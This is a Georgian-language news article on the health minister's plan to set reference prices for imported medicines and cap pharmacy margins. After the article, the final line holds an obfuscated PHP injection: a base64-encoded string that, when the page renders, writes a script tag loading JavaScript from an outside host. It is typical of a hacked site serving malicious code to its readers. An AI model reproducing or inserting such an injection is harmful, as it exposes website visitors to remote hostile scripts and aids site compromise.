celsiusi
ავერსი საქკაბელი
ჯანდაცვის მინისტრ ზურაბ აზარაშვილის განცხადებით, მედიკამენტებზე ფასი იქნება სამართლიანი და ფარმაცევტული კომპანიები 500 და 1000 პროცენტიან მარჟებს ვეღარ დააწესებენ.
 
ჯანდაცვის მინისტრმა საზოგადოებრივი მაუწყებლის ეთერში მედიკამენტების რეფერენტულ ფასებზე ისაუბრა. მისი განმარტებით, ეს მიდგომა შესაძლოა სიახლეა საქართველოსთვის, თუმცა არა ევროპული ქვეყნებისთვის, სადაც უკვე დიდი ხანია მსგავსი მიდგომა დანერგილია.
 
„ეს არის ზუსტად ის შესაძლებლობა, რომ მედიკამენტებზე გვქონდეს სამართლიანი ფასები და ეს სამართლიანი ფასები იმ რეფერენტული ქვეყნებიდან ავიღოთ, რომლებსაც ჩვენს სამიზნე ქვეყნებად განვსაზღვრავთ. უკვე ვართ იმ ეტაპზე, როდესაც მიდის მუშაობა ფასებისა და ქვეყნების განსაზღვრაზე ქრონიკული და ონკოლოგიური მედიკამენტებისთვის, რაც იანვრიდან უნდა დავიწყოთ“, - განაცხადა მინისტრმა.
 
აზარაშვილი ირწმუნება, რომ საკითხზე საქმის კურსშია ფარმაცევტული სექტორიც.
 
„მათთან იყო რამდენიმე შეხვედრა და ვფიქრობ, 2-3 კვირაში საბოლოო ვერსიას წარვუდგენთ და ეცოდინებათ, როგორ ვიღებთ, რომელი ქვეყნებიდან ვიღებთ, როგორ იქნება განსაზღვრული მარჟები და ის მაქსიმალური ზღვარი, რა ფასად ფასადაც შეეძლებათ მედიკამენტების გაყიდვა. მათ საკმარისი დრო ექნებათ, რომ იანვრამდე დაიგეგმონ,“- განაცხადა აზარაშვილმა.
 
ჯანდაცვის მინისტრის განცხადებით, ქართულ ბაზარზე მოქმედ კომპანიებს აქამდე მარჟებზე არანაირი შეზღუდვა არ ჰქონდათ და შეეძლოთ ნებისმიერი მარჟა დაედოთ საკუთარ პროდუქციაზე.
 
„ჯანდაცვის სამინისტრომ აიღო გარკვეული მედიკამენტების ჩამონათვალი და სწავლობს, რა ფასად იწარმოება ან იმპორტირდება ეს წამლები ამა თუ იმ ქვეყანაში. ამ თანხას კი, დაემატება გონივრული მარჟები, რაც საჭიროა დისტრიბუციისთვის და რითეილ ქსელში პაციენტებისთვის მისაწოდებლად. მაქსიმალური ზღვრის ფარგლებში განისაზღვრება ფასები.
 
მაგალითად, თურქეთის ბაზრის გახსნას რომ შევადაროთ, ამით გავაჩინეთ ზუსტად იგივე მედიკამენტის იაფი კონკურენტი. თურქეთში არის მკაცრი რეგულაციები ფასებზე.
 
როცა ზუსტად იგივე მედიკამენტი თურქეთიდან თავისუფალი ფასწარმოქმნით შემოდიოდა, კომპანიებს ნებისმიერი ფასის დაწესება შეეძლოთ. რადგან უკვე იაფიანი კონკურენტი გაუჩნდათ, ახლა უკვე იმ მედიკამენტებზე უწევთ ფასების კლება, რომლებსაც წლების განმავლობაში გაცილებით ძვირად ყიდდნენ. რეფერენტული ფასები შეეხება თურქეთიდან იმპორტირებულ და ყველა სხვა იმპორტირებულ მედიკამენტს. ფასი იქნება სამართლიანი მოგების და ყველაფრის გათვალისწინებით, მაგრამ 500 და 1000 პროცენტიანი მარჟები, როგორც დღემდე შეეძლოთ ჰქონოდათ, ეს შესაძლებლობა ნამდვილად აღარ ექნებათ. სრულად ექნება დაცული მომხმარებელთა უფლებები. ასევე ძალიან დიდი შემსყიდველია სახელმწიფო და სახელმწიფოსაც იგივე ფასად მიეწოდება ეს წამლები“, - განაცხადა ზურაბ აზარაშვილმა.
443
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");